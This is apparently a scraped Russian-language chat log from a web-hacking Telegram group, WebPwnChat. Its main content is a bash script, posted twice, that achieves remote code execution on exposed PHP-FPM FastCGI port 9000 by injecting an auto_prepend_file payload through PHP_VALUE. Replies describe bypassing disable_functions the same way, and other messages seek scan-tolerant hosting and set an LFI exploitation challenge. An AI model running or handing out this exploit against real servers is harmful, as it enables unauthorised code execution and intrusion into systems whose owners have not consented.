Size: a a a

2020 November 09

b

b4tr in WebPwnChat
Alexander Twost
Да я шучу, мне нет пока нужды, если что напишу)
Спасибо)
👍
источник

?

??? in WebPwnChat
А что разыгрывается?
источник

q

q|z in WebPwnChat
раз уж про хостеров вопрос подняли - где хостить всякую бело-серую штуку лучше? сидел на scaleway, но они прибили сервы на атомах :(
источник

s

s3r3n37y in WebPwnChat
php5, LFI
кто первым решит таск получит 10 бесплатных запросов в боте
@getinstasearchbot

в качестве ответа принимается только вариант запроса который позволит эксплуатировать данную багу.
источник

q

q|z in WebPwnChat
q|z
раз уж про хостеров вопрос подняли - где хостить всякую бело-серую штуку лучше? сидел на scaleway, но они прибили сервы на атомах :(
арбузоусточивость особо не нужна, главное чтобы хостер не особо ругался на масскан и прочее
источник

B

Bo🦠oM in WebPwnChat
говорят, через DO сканят
источник

q

q|z in WebPwnChat
Bo🦠oM
говорят, через DO сканят
там с доступностью не очень, как я слышал
источник

L

Lord Voldemort in WebPwnChat
b4tr
👍
Разбань в группе , не буду матюки говорить
источник

WS

Web Security in WebPwnChat
Bo🦠oM
говорят, через DO сканят
Я получил бан без объяснения причин и 1 абузу непонятно от какого сайта (закрыли звёздочками домен), попросил сказать, кто автор жалобы - молчание
источник

b

b4tr in WebPwnChat
Lord Voldemort
Разбань в группе , не буду матюки говорить
ok
источник

L

Lord Voldemort in WebPwnChat
Спасибо.
источник

b

b4tr in WebPwnChat
Lord Voldemort
Спасибо.
done!
источник

PS

Pavel Sorokin in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
   OUTPUT=$(mktemp)
   env -i \
     PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
     SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
     cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

   cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
А disable_functions можно с помощью этой темы обойти? У кого нибудь получилось?
источник

z

zCard1naL in WebPwnChat
Pavel Sorokin
А disable_functions можно с помощью этой темы обойти? У кого нибудь получилось?
А как ты планируешь его обойти?)
источник

B

Bo🦠oM in WebPwnChat
Pavel Sorokin
А disable_functions можно с помощью этой темы обойти? У кого нибудь получилось?
Хм, думаю да
источник

AK

Anton Kirsanov 🐸 in WebPwnChat
Pavel Sorokin
А disable_functions можно с помощью этой темы обойти? У кого нибудь получилось?
можно, также флагами как allow_url_include=1 передается, передаешь disable_functions=''
источник

B

Bo🦠oM in WebPwnChat
Потому что ты ж можешь рулить дерективами php.ini
источник

PS

Pavel Sorokin in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
   OUTPUT=$(mktemp)
   env -i \
     PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
     SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
     cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

   cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
ну эта хрень же меняет настройки в phpfpm процессе. Я пытаюсь, но не получается почему то
источник

B

Bo🦠oM in WebPwnChat
Где тут мастер по phuip-fpizdam, @neexemil
источник

z

zCard1naL in WebPwnChat
Bo🦠oM
Потому что ты ж можешь рулить дерективами php.ini
Но тогда надо пхп перезапускать
источник